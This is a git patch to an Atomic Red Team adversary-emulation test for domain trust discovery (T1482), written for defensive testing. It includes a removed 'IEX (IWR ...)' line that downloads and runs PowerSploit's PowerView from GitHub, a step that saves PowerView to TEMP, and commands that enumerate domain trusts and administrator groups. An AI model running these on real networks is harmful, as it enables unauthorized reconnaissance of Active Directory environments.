From a5cc28bdf2fff8f086e6f8a65e80a3c16a063c1d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= <clement@notin.org>
Date: Thu, 25 Jun 2020 23:43:24 +0200
Subject: [PATCH] T1482: add PowerView dependency & RSAT notes (#1041)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1482/T1482.yaml | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml
index 363a951a34d..b10147bcc39 100644
--- a/atomics/T1482/T1482.yaml
+++ b/atomics/T1482/T1482.yaml
@@ -23,6 +23,13 @@ atomic_tests:
     This technique has been used by the Trickbot malware family.
   supported_platforms:
     - windows
+  dependencies:
+  - description: |
+      nltest.exe from RSAT must be present on disk
+    prereq_command: |
+      WHERE nltest.exe >NUL 2>&1
+    get_prereq_command: |
+      echo Sorry RSAT must be installed manually
   executor:
     name: command_prompt
     command: |
@@ -35,7 +42,27 @@ atomic_tests:
     Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
   supported_platforms:
     - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      PowerView PowerShell script must exist on disk
+    prereq_command: |
+      if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
+  - description: |
+      RSAT PowerShell AD admin cmdlets must be installed
+    prereq_command: |
+      if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember")) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      Write-Host "Sorry RSAT must be installed manually"
   executor:
+    command: |
+      Import-Module "$env:TEMP\PowerView.ps1"
+      Get-NetDomainTrust
+      Get-NetForestTrust
+      Get-ADDomain
+      Get-ADGroupMember Administrators -Recursive
     name: powershell
     elevation_required: false
-    command: IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Get-NetDomainTrust ; Get-NetForestTrust ; Get-ADDomain ; Get-ADGroupMember Administrators -Recursive
+